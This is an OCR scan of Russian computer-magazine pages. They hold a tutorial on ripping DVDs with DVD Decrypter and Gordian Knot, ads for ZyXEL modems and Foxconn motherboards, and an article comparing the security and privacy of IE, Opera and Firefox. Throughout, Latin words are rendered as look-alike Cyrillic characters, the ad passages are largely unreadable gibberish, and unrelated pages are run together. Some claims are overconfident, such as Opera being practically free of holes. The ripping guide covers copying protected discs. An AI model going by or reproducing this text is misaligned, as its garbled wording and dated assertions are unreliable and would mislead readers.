лишь одну оригинальную звуковую дорожку. 
При желании к ней можно добавить и русскую, 
выбрав из них ту, что получше. Наконец, за- 
ходим в настройки (ТооІз/зеШпдз), открываем 



закладку беѵісе и снижаем скорость привода 
до желаемой величины (я предпочитаю 6х). 
Мотив — в общем времени пережатия 0\Ю в 
АѴІ. Чтение с диска происходит очень быстро, 
а вот кривые (в прямом смысле слова) диски 
на больших скоростях вызывают сильную 
вибрацию, отрицательно сказывающуюся 
на здоровье привода (при рипе большого 
количества дисков это становится заметно, и 
приводы летят косяками, как журавли). 

При чтении поцарапанных дисков с боль- 
шим количеством дефектов поверхности, 
имеет смысл установить аппаратный счетчик 
повторов (Нагбѵѵаге геаб еггог геіігез) в нуль. 
При этом привод будет пропускать секторы с 
ошибками без задержек. Вследствие этого на 
видео появится множество артефактов, но в 
противном случае чтение диска с кучей сбой- 
ный секторов растянется на неограниченное 
количество времени. Каждый из нас знает, 
как долго приводы ерзают на ВАО-секторах. 
Хорошо, если такой сектор один, а если их 
несколько тысяч?! 

Если 0\Ю Оесгуріег в упор не видит 0\Ю- 
привод, в соседней закладке І/О находим 
раздел Іпіеііасе и выбираем интерфейс, 
через который 0\Ю Оесгуріег должен взаи- 
модействовать с приводом. На ЫТ-подобных 
системах лучше всего работает ЗРТІ (требует 
прав администратора), следом за ним идет 
АЗРІ (если АЗРІ-драйвер от компании Абаріес 
установлен в системе, чего не происходит по 
умолчанию, прав администратора он не тре- 
бует, но на некоторых конфигурациях сильно 
глючит). Также можно выбрать ЕІЬуСОІО 
(если в системе установлена программа 
СІопеСО) или Раііп-СоиІГп (если установлен 
ВІіпбѴѴгііег). Под ѴѴіпбоѵѵз 9х доступы только 
3 последних варианта, однако, в силу ряда 
присущих ей ограничений, для рипа она кате- 
горически не рекомендуется. 

Остальные настройки здесь не рассматрива- 
ются, так как их слишком много, да и значения 
по умолчанию отлично подходят для подавля- 
ющего большинства задач. 

Покончив с хозяйственными делами, нажи- 
маем кнопочку, символизирующую процесс 
копирования 0\Ю на винчестер и идем пить 
чай. Первый этап мучений на этом закончен. 
Самое сложное еще впереди. 



ЭТАП № 2 



ІЗнакомство с Оогсііап КпоіІ 



Из сотен риперских программ мы выбираем 
Оогсііап Кпоі (переводится как «Гордиев 
узел»). По сути это «графическая морда», 
объединяющая множество различных 
программ, и настоящие профессионалы до- 
вольно пренебрежительно относятся к ней, 
предпочитая все делать своими лапами и 
хвостом. На самом деле, никакого произвола 
здесь нет, и Оогсііап Кпо{ по первому же тре- 
бованию позволяет перейти в ручной режим, 
проявляя минимум искусственного интел- 
лекта и автоматизма. Внимание, не путай его 
с Аиіо-Оогбіап Кпо{ — полностью автомати- 
зированной «мордой», давящей все позывы 
творчества на корню! Результаты рипа, 
производимого одним кликом мыши, хорошо 
известны и довольно печальны: низкое ка- 
чество, проблемы совместимости и т.д. и т.п. 
Как и все входящие в его состав программы, 
Оогсііап Кпоі абсолютно бесплатен и состоит 
из двух частей. Первая — Оогсііап Кпоі Собес 
Раск — коллекция кодеков и декодеков 
( ІтДр://ргбоѵѵпІоабз.зоигсеІогае.пе1/аогбіапкпоб . 
Вторая — Оогсііап Кпо{ гірраск — набор самих 
риперских программ, включающий в себя 
ООІпбех, ѴоЬЗиЬ, ѴігіиаЮиЬМоб, І\ІапбиЬ, 
АѵіЗупіІт, ѵЗігір 0.81 СЗЗ, ІІихзтооіИ и т.д. 

Перед установкой Оогсііап Кпоі Собес Раск 
рекомендуется удалить другие наборы коде- 
ков из системы во избежание конфликтов. 
Вторым шагом устанавливаем Оогбіап Кпоі 
гірраск и видим, что в меню «Программы» по- 
явилась иконка в стиле живописи позднего 
абстракционизма. Запускаем... и получаем 
огромное окно с кучей текста и несколькими 
кнопочками. 

Первые две кнопочки (Рір {Не ѴОВз) пред- 
назначены для тех, кто еще не запускал 
0\Ю Оесгуріег и ничего не грабил. Их мы не 
трогаем, а нажимаем самую нижнюю кнопку 
с изображением киноленты на витрине. 

Вот тут-то наши риперские приключения и 
начинаются. От корректности выполнения 
последующих операций зависит судьба 
всего рипа, так что отодвинем пиво в сторону 
и сосредоточимся. 
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А05І_-модемы 2уХЕІ_. 

С другими люди не связываются 



Для подключения кИнтернетучпііез 
А 05 1_ выбирайте специально 
ада птирйв&н н ыѳ для рОСС ийских 
условий модемы или интернет- центры 
кОм пл нии 2уХЕ І_, ре кОм он дсзван нью к 
применению ведущими провайдерам и. 
Благодаря фи[ииенному меха низ му 
а у щиты от пени ех вы получите 
максимальную сжорость Интернета, тр 
есть но будете платить ЗД сбои и потери 
в телефоннсзй линии. 

р-&30$ 

Кгмлгчгттлн молпы 

дітЭі. дм НОШѴОП'Ч» 

■спи і#0угбу*9 
С гнетом и&в 



При нас тройке обыч ног о А 05 !_ - м одема 
нужно продалап ь дюжину операций или 
вызывать на доги технического 
специалиста. Но это уяее прошлом. 

С новойингеллектуальной технологией 
7уХЕ1 МеіРгІепб достаточно выбра і ь 
вашего провайдера и тариф из списка — 
и весь процесс насі ройки И н і ернета 
и интеракт ивного телевидения займет 
не более пяти минут I Технология А ОБЬ в 
ин і ерне г- цент рах ^уХЕ І_ поз вол нет сразу 



на нескольких домашних компьютерах 
загружать веб-страницы, музыку, 
работать с электронной почтой, смотреть 
цифровое телевидение через приставку 
и в то же время беспрепятственно 
разговаривать по телефону. Все модемы 
^уХЕІ_ поддерживают новейший стандарі 
Д □512'+ і то есть вы сможете получать 
через обычную телефонную розетку даже 
і елепрогра м м ы в ысокой ч еткос і и. 




р -660И0 

УМЯР И Ш Ы Ч ЫЙ ИУШМ 
с іпортіши из# 
и ЁКі&пч?! для любого 
ксгмгъ^ітщ>л 





я-е&онт 

Дрмяілий «пррщгг-кдаотр 
с молям л м АЙЗіЯ-* лдя трезг 

ИЙМРЫОТврОВ И 1н прічгтягіки 



я-бвйн™ 

Ллм?п*іцй іМГгрріЧТ-ИОіпТ' ^ ЧМРЧСЫ 
аІ®і :Т- ■’ ѴД- - 1 для трок ьомрмоіщриі 
ТВ 1 ррн^тприч ы боспрдодавді 
►чѵтбуііім 




р-ебонт 

милям АЙЗОН лггя 

КОМП! лутррл С портоы 
ЁІГЧТПОІ 



Н Быстрая 
настройка 
Меіргіепсі 



Бпсплптнгія горячая лития іуХЕІ_‘ 
(495) 542-6929, 6 (600) 200-6929 
огппі.2ухеІ.ги 



2уХЕІ. 




> Начинаем подготовку рипа в ОРІпсіех 



> Подбор КеШ орегаііоп — тут главное не ошибиться 




> Все необходимое для 
создания ОѴО-Вір'аты 
найдешь на РѴО к жур- 
налу. Не пропусти: для 
тебя будет подготовлена 
специальная подборка! 




> ѵѵѵѵѵѵ.бооіті9іті.ога 
— лучший ресурс о том, 
как правильно создать 
ОѴО-Рір. 

> догсІіапкпоІзоигсеЬгде. 
пе| — официальный сайт 
программы Оогбіап Кпоі. 
> ѵѵѵѵѵѵ.біѵх.сот — оп- 
тимальный кодек для 
ОѴй-Ріір'а. 



ВШМШШ 



>Вся приведенная 
информация дана 
исключительно для оз- 
накомления и ни в коем 
случае не может быть 
использована в проти- 
возаконных целях. 



ЭТАП № 3 



ІП од готовка б2ѵ-проекта| 



Поначалу ситуация выглядит не сложной и совсем даже 
не угрожающей. Появляется приложение ООІпбех, в меню 
Рііе которого мы выбираем пункт Ореп (или нажимаем 
<Р2>), после чего переходим к директории с награбленны- 
ми ѴОВ'ами и, удерживая <8НіЙ>, выделяем все имеющи- 
еся файлы. РІажимаем «ОК» и в следующем диалоговом 
окне говорим «АОО». 

Теперь файлы добавлены в проект, и можно начинать 
предварительный просмотр фильма. РІажимаем <Р5> (Рііе 
-> Ргеѵіеѵѵ) и видим окно, отображающее видео, и инфор- 
мационную панель справа от него. 

Информационная панель здесь самая главная. Во-первых, 
она отображает Азресі Яаііо (соотношение ширины и вы- 
соты), который в данном случае равен 16:9, что соответс- 
твует нормальному широкоформатному видео. Проверь 
надпись на ОѴО-обложке, там должно быть написано 
1 6:9 или 1 ,85, что одно и то же. Однако на коробках часто 
пишут совсем не то, что мы наблюдаем в реальности, а 
ООІпсІех временами ошибается, так что доверять можно 
только своим глазам. Запускаем ОѴО-диск на програм- 
мном/аппаратном плеере и смотрим, похож ли он на 16:9 
или все же ближе к 4:3. 

РІеверное определение аспекта, в общем-то, не 
фатально, хотя и ведет к неприятным искажениям 
изображения. Г ораздо важнее правильно определить 
частоту кадров (поле Ргате Яаіе). В данном случае она 
равна 25,000 Трз, что говорит о том, что мы имеем дело с 
РАІ_. Еще бывает ІЧТ5С, частота кадров которого равна 
23,976. Тип видео обычно указывается на обложке 
диска, но не всегда соответствует истине, как не 
всегда правильно распознается программой. Ошибка 
определения частоты ведет к рассинхронизации звука 
и изображения, практически незаметной в начале, но 
быстро прогрессирующей и к концу фильма достига- 
ющей нескольких минут. Поэтому к выбору фз следует 
подходить очень тщательно и обстоятельно. 

Если программа показывает 20,000 Трз, это значит, что 
мы имеем дело с РАІ_'овским материалом, но в меню 
Ѵібео/РіеІсІ Орегаііоп активирована опция Рогсеб Рііт. 
Переключаемся в режим РІопог РиІІбоѵѵп РІадз («учиты- 
вать риіібоѵѵп-флаги») и дезактивируем ее, остановив 
предварительный просмотр по <Е8С> и вновь возобновив 
его по <Р5>. 

Что же это за флаги такие? Все просто. Съемка на 
стандартную кинопленку идет с частотой 24 кадра в 
секунду, а РАІ_, исторически привязанный к частоте в 



электрической сети (50 Гц) в купе с черезстрочечной 
разверткой, бежит со скоростью 25 кадров в секунду. 
Выход: чтобы сохранить статус-кво, один кадр из 24-х 
должен быть продублирован. Но какой смысл пихать 
лишнюю информацию в видеопоток, расходуя драго- 
ценные килобайты? Вот разработчики МРЕѲ2 и пред- 
ложили вместо целого кадра записать специальный 
флаг «повторить предыдущий кадр еще раз». В ІЧТ8С, 
изначально привязанном к электросетям с частотой 
60 Г ц, вставлять дублирующие кадры приходится еще 
чаще! 

Собственно говоря, режим Ідпоге РиІІбоѵѵп РІадз («игно- 
рировать риіібоѵѵп-флаги») предусмотрен исключительно 
для демонстрации того, что происходит при игнорирова- 
нии риіібоѵѵп-флагов (а происходит рассинхронизация 
видео с изображением) и крайне редко бывает полезен 
на практике. Если значение Ргате Ваіе равно 23,976 фз 
при Ѵібео Туре, равном ІМТ8С или РІІ_М с процентным 
числом, большим или равным 95%, то мы имеем дело с 
ІМТ8С и ничего двигать не нужно (галочка Рогсеб Рііт уже 
поставлена программой автоматически). 

А вот если Ргате Ваіе равно 23,970 Трз, и Ѵібео Туре равно 
КІТЗС или РІІ_М с процентным числом меньше 95%, то пе- 
реводим галочку в Нопог РиІІбоѵѵп РІадз и отмечаем себе в 
уме, что в последующем будет нужно проделать операцию 
обратного ІѴТС-преобразования. 

Покончив с фз, переходим к звуковым дорожкам и в 
меню Аибіо выбираем Оифиі МеФоб ОетихТгаскз 
(«Метод вывода -> Отделение треков»). Также можно 
поставить галочку ЫогтаПгаНоп и задать желаемую 
громкость звука (я выбираю 1 00%). Далее необходи- 
мо указать, какие именно звуковые дорожки следует 
отделять. Идем в меню Аибіо, Тгаск ІМитЬег и указываем 
номера треков, которые необходимо выделить, чтобы 
в дальнейшем их можно было наложить на сжатый 
видеопоток. Номера треков, присутствующие в ѴОВ'е, 
перечислены в разделе Аибіо информационной панели, 
и они совпадают с порядком номеров звуковых доро- 
жек в 0\Ю ОесгурЩг. 

Покончив с этим, в меню Рііе выбираем пункт Заѵе Рпфесі 
или давим <Р4> и несколько минут ждем, пока информа- 
ция о проекте записывается в б2ѵ-файл и «выдираются» 
звуковые дорожки. 




Мы проделали большую работу, но б2ѵ-проект — это 
всего лишь информация о 0\Ю, но еще не сам фильм. В 
следующей статье будет показано, как преобразовать 
ѴОВ'ы в АѴІ с минимальной потерей качества и наложить 
звуковую дорожку И-Е 









97 5Х 

ііЛКІКнЧІІ 



Игры кинематографического качества! 

Получи свой билет в мир цифровых развлечений с 
новыми системными платами Рохсопп Р965 и 975Х7АВ! 



ЗііррМЕІ 



Технология РОХОМЕ 



о РОХОМР - расширен ные 

ВОЗМОЖНОСТИ рлігоиа 
о ОивІ ЁЮЙ2 Ш * &І 9 ЛЪН 1_АМ 
о 7.1 сП НПА АиОіо 



СМСГСЧи РКГВДВ И ЧЭКТрі-ПН СИ-ГГТЧІѴ К> №ГС№А ■■ 

м г смі'ѵ--цкк* йсгі, "іч-ч-' мтрикь**- ііа ійч-чх-чг'ігіі 
:іл I ТЧ |4 л р. я ;*»•>*-' *-* Л § Н ЁМ *ТІ І-Лг* 1 - !«•»' І«. 
КРШЬШТ^ П Ж&ОГЯѴХІЩ ГГ ндгтгг>:и. ДПЬ ПООфЯГйЗЧ.'Ы 

ГЧЧЗДР*ГГПГ« ‘ррріпй" доилям г йпгет?Ліі*им 

кіг-г Кгйм-н^г*: ііміѵикірЛц .-и ірш 



0 Нднлучшие возможности 
для еверклокеров 



Р9657АА-8ЕКВ82Н 



Цифровое Управление Питанием 

Риск УѴ Г «Г>.Ѵ^Г «'.ЧѴМ’і.'т'іІІ+Л ѴПНМч'- ЧіКЕЛП й&ЗС№МфГТ 
^іыяГіирО Гііицр. іь * ігг^мр'гитчя;!^ '!рт ц* и* іу 

пнщггдо- ■ :■! і-іл «‘зк-і мн^і т^иш <ѵ ш*С(> >■ г с< гг Гпгсооп, 
мчлгг.^чй ігкрл^лтга гнрлт^вгллив и цтг.ч*«іыг^ти 
І т#4р*ч*ад;іі. | ір І щ рі р , чгашірпсі и#я?|»гчлчын ф#^гійви і^Щ 



о ГОХОМЕ - расширенные 
возможности разгона 
о Ои з I 0&Й2 ВСШ + ОішІ ЁІдоЫі ЬАН 
о 7.1 сЬ ИОД АиіЛІо + 2 к РС Іо *1В 
(с поддержкой Сюи^лге) 
о Послтаінчя супчрнгро ешч ПЛНТЙ, 
раз работай на я слецидл-ьио 
длп энтузиастов 



“Ьирр-сг съ 



йл'Г*РІ* Г Ц/УрДОьМ Т^ГШіііНЧ, ІД» » : ЖіПч^Г'.Ч^О •ШМ^иЮТ' ОТ 

іу+вОЙш Ьд и щ пр^ч; р#ч'іч * ѵоип.ичрѵ.3 СМИ Ш, ЗД у 

оХ ^'’цу: ■ ^ггг>о№ і* лечо -тъм лдошида -<=» >аді пэардап. 

ЫИ««ГЬ#ФПи Фет ГН • к № 'ЛТк, 



975 X 7 АВ-ВЕКЕ 82 Н 



МЮН ««Сет -ЧЗЬ?ГЛ-МИ>: ІСгЛКвІЬгг |,Щ)ЯНИ2; Ц*Я ЕкхЗгсга - 1«Я7ЭОЛЛ5; Иаі" <дан*иа-срі - Ц*И)П5-0ИН. АРХИС |-«5)аЮМ<ІІ; Всл^і МКР -ЛОТОВОЙ - |«Нр1Е-Э6Я; ЛѵЛи - И9^:ЧІ-йШ: 
■ІШ^РТРдЦВИ >;•№<»( ЗН2 Ь ПъМ «■ чі.тніКі^ит. І+ТЯ^+КІ, ЧРЯТПРГ міь йЖ.>МЫ»рніІі ЧйМІинОН ГвЛр» ?ДЗ; СпіНыі ІЫйГй («^ЯКЦЗ^УІ І І.чРір (+71)771-771-7; 

Хги-^жи: Кетнлеръу гае - Інттгп ШгТрт ■ №№ Ікрні - 'СШРМВД Ем™***!*: 5р*и ■ ГМ^П-СВД: Тркпн^ - №[№■?№, Л-сто. іксщш- ВД* - ЛЧІ1Н»-ЙИ: 

'гро 'ИІ рек 2 ЭОД ■ НРОС ЮГА - ГЯіОДОЧІНО; Пгсчи і'кі* Тсышмщ** • [ЙЩИЗ-адіі; Пятцлоро Днтчеь ;9ЛЭУЛ71ПІ; РИГИ фзргв - 06ЫНСТВДІЛ; Слчдря Ляле і‘Й4й.]77Ц-ИЫІ. 
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БЕЗОПАСНЫЙ ѴѴЕВ-СЕРФИНГ 



ГОРЬКАЯ ПРАВДА 

о популярных браузерах 

Я ЗНАЮ ОЧЕНЬ МНОГИХ ЛЮДЕЙ, СЧИТАЮЩИХ, ЧТО ДЛЯ ПОЛНОЙ БЕЗОПАСНОСТИ ИМ НЕОБХОДИМА САМАЯ МАЛОСТЬ - ПОСЛЕД- 
НЯЯ ВЕРСИЯ «КАСПЕРСКОГО» И ГРАМОТНО НАСТРОЕННЫЙ ФАЙРВОЛ. ЕРУНДА ЭТО ВСЕ! УЖ МЫ-ТО С ТОБОЙ ЗНАЕМ, 

ЧТО ОТХИТРОУМНОЙ ЗАРАЗЫ НИ АНТИВИРУС, НИ БРАНДМАУЭР Н Е СПАСУТ. И ДАЖЕ ПРОСТО БЛУЖДАЯ ПО ИНТЕРНЕТУ 
С ПОМОЩЬЮ БРАУЗЕРА, КАЖДЫЙ ИЗ НАС РИСКУЕТ ПОДЦЕПИТЬ ЗАРАЗУ, ЦЕЛЬЮ КОТОРОЙ МОЖЕТ СТАТЬ КАК ЭЛ ЕКТРОННАЯ 
НАЛИЧНОСТЬ, ТАК И СОДЕРЖИМОЕ ЖЕСТКОГО ДИСКА. ДА ЧТО ТАМ ГОВОРИТЬ, ЕСЛИ БРАУЗЕРАМ НЕ ПОД СИЛУ ДАЖЕ ЗАМЕСТИ 
СЛЕДЫ ПРЕБЫВАНИЯ НА СОМНИТЕЛЬНЫХ РЕСУРСАХ. ПРИЧЕМ БОЛЬШИНСТВО ИЗ НАС ОБ ЭТОМ ДАЖЕ НЕ ПОДОЗРЕВАЕТ, СВЯТО 

ВЕРЯ В КНОПКУ «УДАЛИТЬ КЭШ И ИСТОРИЮ ПОСЕЩЕНИЙ». 



О Сила в правде 

что теперь? Отключиться от Сети 
и удариться в низкоуровневый 
кодинг? Нет, есть более демок- 
ратичные меры! Чтобы выходить 
в инет без страха, совсем не нужно знать дзюдо 
и быть Шварцем, достаточно просто прочитать 
эту статью. И прежде чем ставить жутко наворо- 
ченную сигнализацию или врезать выдранный 
из сейфа замок, следует уяснить, что информа- 
ционная безопасность — это не товар, а услуга. 
Ни один из продуктов (как коммерческих, так 
и бесплатных), присутствующих на рынке, не 
в состоянии надежно защитить компьютер, 
поскольку на каждую хитрую идею найдется 
идея покруче и изощренней. Можно очень 
внимательно читать релизы многочисленных 
программ, обещающих защитить тебя от всего 



и вся, но полагаться стоит только для себя. А для 
этого, как ни крути, придется узнать побольше 
о том софте, который ты ежедневно исполь- 
зуешь. Обезопасить себя от массовых червей 
и воинствующих хулиганов вполне возможно. 
Еще проще спрятать компрометирующие 
данные, которые браузеры генерят в таком 
изобилии, что люди в погонах расплылись бы 
в экстазе, добравшись до твоего компьютера. 
Но обо всем по порядку. 

□ Факторы угрозы 

Количество хакерских атак неуклонно растет, 
и значительная их часть приходится наѵѵеЬ- 
браузеры. Из всех факторов риска в первую 
очередь можно выделить следующие 3: 

1 . атака на сам браузер с засылкой троянской 
программы; 



2. сбор данных о пользователе (с какой стра- 
ницы пришел, под каким ІР); 

3. сохранение компрометирующих данных 
о посещенных страницах на жестком диске; 
Поясню сказанное на конкретных приме- 
рах. Практически все браузеры страдают 
дефектами разработки (или в просторечии 
дырами). Через дыры лезут черви, вирусы 

и другие вандалы. Независимо от текущей 
политики безопасности в настойках браузера 
при посещении страницы всегда, повто- 
ряю, всегда существует угроза подцепить 
какую-нибудь заразу, проникающую сквозь 
антивирусы и брандмауэры. Причем это отно- 
сится не только к порнографическим сайтам 
или востребованным ресурсам с кейгенами 
и кряками, но и к серверам весьма респекта- 
бельных компаний. Известен случай атаки на 




/048 



ХАКЕР 12/96/ 06 




» 



рс_Еопе 




> Вот так просто можно найти практически любую заразу 



гостевую доску совсем нехилой фирмы АІѴЮ, 
результатом которой стали тысячи заражен- 
ных пользователей. И хотя это не правило, а, 
скорее, экзотическое исключение, ездить на 
дырявом браузере не безопасно. 

К тому же честные браузеры негласно пере- 
дают серверу большой объем информации 
о пользователе: версию самого браузера 
(вместе с региональными настройками), 
языковую кодировку, часовой пояс, ШІ_ 
предыдущей посещаемой страницы, ІР-адрес 
— словом, достаточно для того, чтобы сдать 
тебя. Несмотря на то что де-юре данная 
информация не считается конфиденциаль- 
ной, факт ее разглашения существенно 
напрягает, особенно если пытаешься выдать 
себя за девушку Кее-Кее, живущую в Япон- 
ском городе Фукуока, которая по какой-то 
мистической причине использует русскую 
версию браузера с московской Тіте-2опе 
в придачу. Так что легкий флирт очень быстро 
заканчивается. 

Третий фактор — самый серьезный. Ком- 
пьютер помнит все наши шаги, сохраняя на 
жестком диске уйму компрометирующей ин- 
формации, которую не так-то просто удалить. 
Каждый гражданин имеет право на тайное 
посещение сайтов нетрадиционной направ- 
ленности, гарантированное Конституцией, но 
далеко не каждому удается реализовать это 
право на практике. Я уже не говорю о просто 
хакерских сайтах и конференциях, которые 
приходится посещать, исходя из профессио- 
нальной необходимости, хотя афишировать 
подобную активность отнюдь не желательно. 
Более того, пароли и прочая информация, 
сохраненная в куках, становится легкой 
добычей троянских программ, одногруппни- 
ков/коллег или даже членов семьи. 
Обеспечение собственной безопасности 
требует целого комплекса защитных мер, 
которые делятся на серверные и клиентские. 
К серверным в первую очередь относится 
выбор надежного анонимного ргоху, о чем 



мы в «Хакере» писали уже не раз и не два. 
Поэтому не будем повторяться, а лучше сразу 
займемся клиентской проблемой, то есть 
браузером. 

ВЫБОР БРАУЗЕРА 
□ Іпіегпеі Ехріогег 

Общ-эя Безопасность: 

Іпіегпеі Ехріогег — это определенно самый по- 
пулярный сетевой обозреватель всех времен 
и народов. Одновременно с этим — самый 
небезопасный и дырявый. Практически каж- 
дую неделю в нем обнаруживается свежая 
порция новых дыр, а сколько ошибок оста- 
ется не выявленными, можно только гадать! 

И уж точно они будут замечены профессио- 
нальными программистами. Раз — и сразу 
появится эксплойт, жертвой которого можем 
стать и мы. 

Компрометирующие данные: 

Но дыры — это еще не все. Хуже всего, что 
ІЕ страдает хроническим недержанием 
конфиденциальной информации. В первую 
очередь это относится к кэшу, истории, 
АсІіѵеХ-компонентам и кукам. По умолчанию 
кэш размещается в каталоге Юоситепіз-п- 
ЗеДіпдз\и5ег-пате\І_осаІ ЗеиіпдзХТетрогагу 
Іпіегпеі РіІез\и, по идее, в любой момент 
может быть удален по команде «Сервис -> 
Свойства обозревателя -> Общие -> Времен- 
ные файлы интернета -> Удалить файлы». 

Но не все так просто! За счет грубых ошибок 
в системе индексации часть файлов просто 
не удаляется (в чем легко убедиться, загля- 
нув в указанный каталог после его очистки). 
Туда же попадают и вложения электрон- 
ной почты при открытии аттачей в Оиііоок 
Ехргезз, причем штатными средствами 
ІЕ они обратно уже не удаляются. Самое 
интересное, что индексный файл іпсіех.сіаі, 
находящийся в том же подкаталоге, физи- 
чески не очищается и продолжает хранить 
адреса посещенных сайтов. Да, чисто 



АТАС! НАС ПОИМЕЛИ! 



После секса без презерватива, в смысле 
блуждания по Сети с ІЕ (а ведь мы же предуп- 
реждали), душу начинают терзать смутные 
сомнения: «А не подцепили ли мы чего?! » 

Тут же устанавливаются самые свежие 
версии антивирусов, которые, естественно, 
ничего не находят, от чего подозрения только 
усиливаются, распространяя устойчивый 
запах паранойи. Нам кажется, что компью- 
тер ведет себя как-то не так, и любой сбой 
трактуется как: «Ну все, конец, это вирус». 
Как отловить заразу? Достаточно простым, 
но эффективным тестом на внедрение зара- 
зы был и остается поиск по вновь созданным 
файлам. 99,9% троянских и шпионских ком- 
понентов не утруждают себя модификацией 
даты создания файла (не путать с так называ- 
емой МЗ-ООЗ-датой), а потому и палятся еще 
на излете. После посещения подозрительных 
уголков Сети как можно быстрее нажимаем 
на «Пуск», где видим «Найти -> Файлы и пап- 
ки». Ищем файлы, созданные за последний 
день на диске С (для надежности можно 
охватить и другие диски). Там будет много 
всего, но нас в первую очередь интересуют 
исполняемые файлы, динамические библи- 
отеки и прочие программные компоненты, 
расположенные в Ргодгат Рііез и каталоге 
ѴѴіпбоѵѵз. 

Вот, например. В глаза сразу же бросается 
еріпб.ехе, расположенный в С:\\Л/11\Л\Л\ 
Зузіет^2. Мы туда его не клали. За Ніе\л/32. 
ехе и каб.О.О.ЗОЗш.ехе в ТЕМР'е можно не 
опасаться — это мы сами только что их ска- 
чали. Остальные файлы представляют собой 
файлы данных (кучи, содержимое кэша бра- 
узера, логи безопасности) и к вредоносным 
компонентам никакого отношения не имеют. 
АвотеріпИ.ехе нас все-таки поимел. Что де- 
лать?! Если есть опыт, дизассемблировать 
самим, если нет, отсылать в «Лабораторию 
Касперского». По моим наблюдениям, она 
реагирует на поступление новой заразы 
оперативнее других. 



теоретически, они постепенно затираются 
в процессе посещения новых страниц, но 
не все и не всегда. На скриншоте приведен 
фрагмент индексного файла после его 
очистки штатными средствами ІЕ. Как вид- 
но, владелец компьютера посещал сайты 
весьма компрометирующего характера, 
но почему, черт возьми, следы оставила 
хваленая система очистки?! 
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«ИЗ ВСЕХ ГРАФИЧЕСКИХ БРАУЗЕРОВ 
БЕЗОПАСНЕЕ ВСЕГО БЕЗУСЛОВНО ОРЕКА» 



Хинты: 

Решение проблемы состоит в ручном уда- 
лении всего содержимого папки Тетрогагу 
Іпіегпеі Рііез, но при этом необходимо выйти из 
системы и войти под другим пользователем, 
поскольку в противном случае доступ к части 
файлов будет заблокирован. Однако следует 
помнить, что физического удаления фай- 
лов при этом не происходит и утилиты типа 
ОеЮаіаВаск (ОеЮаіаВаск) могут вернуть их 
назад, пока они не будут основательно затер- 
ты новым содержимым. Снизить вероятность 
восстановления до нуля помогут вайперы, 
например ВСѴѴіре ( ѵѵѵѵѵѵ.іеіісо.сот ) или 
Зіедапоз Заіе ( ѵѵѵѵѵѵ.зіеаапоз.сот ). История 
посещения страниц хранится в папке Нізіогу, 
в том же каталоге, что и Тетрогагу Іпіегпеі 
Рііез. Естественно, лучше и надежнее всего 
очищать ее вручную. Куки лежат в папке 
Соокіез, в подкаталоге на один уровень выше. 
А вот АсііѵеХ-элементы (и создаваемые 
ими файлы) могут храниться в любом месте 
диска, где только пожелают. Причем никакой 
возможности уследить за ними у нас нет, ведь 
фактически это обыкновенные исполняемые 
программы! Кстати, стоит отметить, что при 
определенных обстоятельствах ѴѴіпсІоѵѵз 
едет крышей и сохраняет все это хозяйство 
отнюдь не в І_осаІ Зеіііпдз, а непосредственно 
в самом каталоге ѴѴіпсІоѵѵз! Так что надо быть 
начеку! А еще лучше сменить браузер на 
более надежный! 

□ Орега 

0БЩ5Я БеЗОПаСНОСТЬ: 

Широко распространенный в узких кругах, 



этот браузер практически не содержит дыр. 
Во всяком случае, документально подтверж- 
денных атак зафиксировано не было. Даже 
если кто-то и кричит о работающем эксплой- 
те, то, скорее всего, нагло врет или вообще 
не понимает, о чем говорит. Орега на текущий 
момент неприступна. 

Компрометирующие данные: 

Все данные, поступающие из Сети (кэш, куки, 
история посещений), хранятся в единствен- 
ном месте — в папке Орега\ргоІіІе. Там же 
хранятся зкіп'ы и другие настройки, поэтому 
удалять эту папку целиком не рекомендует- 
ся. В отличие от ІЕ, она не будет воссоздана 
автоматически при последующем запуске 
браузера. Стандартные средства очистки 
приватного содержимого также, к сожале- 
нию, не без греха и содержат ряд ошибок, 
в результате чего качество очистки оставляет 
желать лучшего. Тем не менее, блуждая по 
Сети с Оперой, за хакерские атаки можно не 
волноваться. 

Хинты: 

Содержимое профиля (вместе с самой 
Оперой) очень легко перенести на іІазИ-бре- 
лок. Тогда на жестком диске никаких следов 
нашего пребывания уже не остается. Добавь 
к этому возможное шифрование данных 
на сменном носителе и почувствуешь себя 
в памперсах. К тому же Опера поддерживает 
развитую и хорошо продуманную систему 
клавиатурной навигации, обеспечивающую 
намного более быстрый серфинг, чем просто 
Іпіегпеі Ехріогег с одной только мышкой. 



Другое немаловажное достоинство Оперы 
— ее бесплатность. Новые версии ІЕ уже не 
являются частью операционной системы, 
как раньше, и раздаются только легальным 
пользователям ѴѴіпсІоѵѵз, а в будущем за 
них планируется взимать дополнительную 
плату. А тут тебе — олимпийское спокойс- 
твие к хакерским атакам, возможно, самая 
шустрая производительность и отменная 
функциональность! 

ОРіге^ох 

0БЩ5Я Безопасность: 

Горящий Лис — стихийно возникший на 
обломках Ыеізсаре, довольно популярный, 
но, увы, дырявый и категорически небезо- 
пасный браузер, причем с каждым днем дыр 
в нем обнаруживается все больше и боль- 
ше. Массовых атак на Лисов до сих пор не 
наблюдалось в силу того, что подавляющее 
большинство все-таки сидит под ІЕ, а Лиса 
ставят себе в основном достаточно продви- 
нутые пользователи, справиться с которыми 
на порядок сложнее. Но угроза подцепить 
троянскую лошадь при посещении ѵѵеЬ-стра- 
нички вполне реальна, а вот стоит ли с ней 
считаться или понадеяться на авось, каждый 
должен решать сам. 

Компрометирующие- данные: 

Свои следы Рігеіох хранит сразу в двух местах. 
ПапкаЮоситепіз-п-Зейіпдз\изег-пате\ 
Арріісаііоп □аіа\Мо 2 ІІІа\Рігеіох\РгоЛез\случай- 
ный_набор_букв_и_цифр.сІеіаиІі, помимо кучи 
пользовательских схем, настроек и расшире- 
ний, дает приют файлам соокіез.іхі и Ітізіогу.сіаі, 



когда появились браузеры 



Октябрь 1 994 

ІМеізсаре ІМаѵідаІог 
0.9. 




Август 1 995 

Іпіегпеі Ехріогег Тог 
ѴѴіпсІоѵѵз 1 .0. 




Сентябрь 1 996 

Орега 2.0Ы. 




Сентябрь 2002 

РігеРэхО.І . 




Июнь 2003 

Заіагі 1 .0. 
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> Небезопасный движок ІЕ не мешает Неаізеек’у шифровать все 
конфиденциальные данные 



> Из всех графических браузеров безопаснее всего 
безусловно Орега 




Хинты: 

Для Лиса существует огромное количество 
расширений, многие из которых запоминают 
некоторую информацию в своих собственных 
местах (например, историю поисковых за- 
просов, адреса наиболее часто посещаемых 
страниц и т.д.). За этим надо следить. Но зато 
плагины расширяют РігеТох до совершенно 
недостижимых для ІЕ границ. Если отдел 
маркетоидов и дизайнеров ІЕ курит хорошую 






траву и выдумывает фенечки, «реально необ- 
